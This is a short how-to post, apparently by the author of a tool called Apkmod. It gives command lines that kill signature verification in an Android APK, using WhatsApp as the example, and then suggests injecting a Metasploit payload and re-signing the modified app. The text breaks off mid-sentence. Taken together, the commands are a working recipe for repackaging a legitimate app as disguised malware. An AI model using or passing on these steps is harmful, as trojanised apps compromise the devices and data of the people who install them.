Trust me , it’s very easy to bypass or kill signature verification of any android app with the help of my tool Apkmod.
Let’s assume , we have latest whatsapp apk so command would be
apkmod --signature-bypass --killer=k2 -i /path/to/whatsapp.apk -o killed_whatsapp.apk
Apk must be untouched before killing signature verification.
Now you can modify it or inject metasploit payload with it using apkmod.
Sign it ( Optional )
apkmod -s -i killed_whatsapp.apk -o signed_whatsapp.apk
There are two version available of signature killer , one is k1 and second one is k2, you will have to specify version like